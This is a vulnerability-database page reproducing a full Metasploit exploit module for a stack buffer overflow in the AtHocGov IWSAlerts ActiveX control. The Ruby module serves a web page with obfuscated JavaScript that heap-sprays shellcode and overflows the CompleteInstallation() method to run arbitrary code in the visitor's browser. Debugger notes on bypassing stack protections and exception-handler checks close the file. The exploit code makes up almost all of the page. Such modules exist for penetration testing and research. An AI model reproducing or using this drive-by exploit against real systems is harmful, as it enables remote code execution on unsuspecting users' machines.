Lucene search
K

AtHocGov IWSAlerts ActiveX Control Buffer Overflow

🗓️ 26 Nov 2009 00:00:00Reported by MCType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Stack overflow in AtHocGov IWSAlerts ActiveX Control when sending an overly long string to CompleteInstallation() method allows arbitrary code execution. Silently patched by the vendor.

Code
`###  
## This file is part of the Metasploit Framework and may be subject to  
## redistribution and commercial restrictions. Please see the Metasploit  
## Framework web site for more information on licensing and terms of use.  
## http://metasploit.com/projects/Framework/  
###  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'AtHocGov IWSAlerts ActiveX Control Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in AtHocGov IWSAlerts. When  
sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll  
(6.1.4.36) an attacker may be able to execute arbitrary code. This   
vulnerability was silently patched by the vendor.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'MC' ],   
'Version' => '$Revision:$',  
'References' =>   
[  
[ 'URL', 'http://www.athoc.com/products/IWSAlerts_overview.aspx' ],  
[ 'URL', 'http://www.metasploit.com/' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 1024,  
'BadChars' => "\x00",  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]   
],  
'DisclosureDate' => 'Feb 15 2008',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])  
], self.class)  
end  
  
def autofilter  
false  
end  
  
def check_dependencies  
use_zlib  
end  
  
def on_request_uri(cli, request)  
# Re-generate the payload.  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Encode the shellcode.  
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))  
  
ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)  
  
js = %Q|  
try {  
var evil_string = "";  
var index;  
var vulnerable = new ActiveXObject('AtHocGovGSTlBar.GSHelper.1');  
var my_unescape = unescape;  
var shellcode = '#{shellcode}';  
#{js_heap_spray}  
sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);  
for (index = 0; index < 12500; index++) {  
evil_string = evil_string + my_unescape('#{ret}');  
}  
vulnerable.CompleteInstallation(evil_string);  
} catch( e ) { window.location = 'about:blank' ; }  
|  
  
opts = {  
'Strings' => true,  
'Symbols' => {  
'Variables' => [   
'vulnerable',  
'shellcode',  
'my_unescape',  
'index',  
'evil_string',  
]  
}  
}  
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)  
js.update_opts(js_heap_spray.opts)  
js.obfuscate()  
content = %Q|  
<html>  
<body>  
<script><!--  
#{js}  
//</script>  
</body>  
</html>  
|  
  
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
  
# Handle the payload  
handler(cli)  
end  
  
end  
=begin  
IDL info...  
[id(0x00000022)]  
HRESULT CompleteInstallation([in] BSTR strParam);  
  
$~/trunk/./msfpescan -f AtHocGovTBr.dll  
AtHocGovTBr.dll: Microsoft Visual C++ v7.1 EXE [165]  
AtHocGovTBr.dll: Microsoft Visual C++ v7.1 DLL [159]  
  
// smash /GS  
$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SecurityCookie  
SecurityCookie 0x4278193c  
  
// /SafeSEH, not today.  
$~/trunk/./msfpescan -i AtHocGovTBr.dll | grep SEH  
SEHandlerTable 0x42774e40  
SEHandlerCount 0x0000021b  
  
0:000> !exchain  
0013cae0: ntdll!_except_handler3+0 (7c90ee18)  
CRT scope 0, filter: ntdll!RtlFreeHeap+613 (7c93bec5)  
func: ntdll!RtlFreeHeap+617 (7c93bece)  
0013cb1c: AtHocGovTBr!SetOfflineInstall+a0b4 (4274f944)  
0013dd9c: 61473161  
Invalid exception stack at 47306147  
0:000> !pattern_offset 5140 0x47306147  
[Byakugan] Control of 0x47306147 at offset 4680.  
0:000> !pattern_offset 5140 0x61473161  
[Byakugan] Control of 0x61473161 at offset 4684.  
=end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation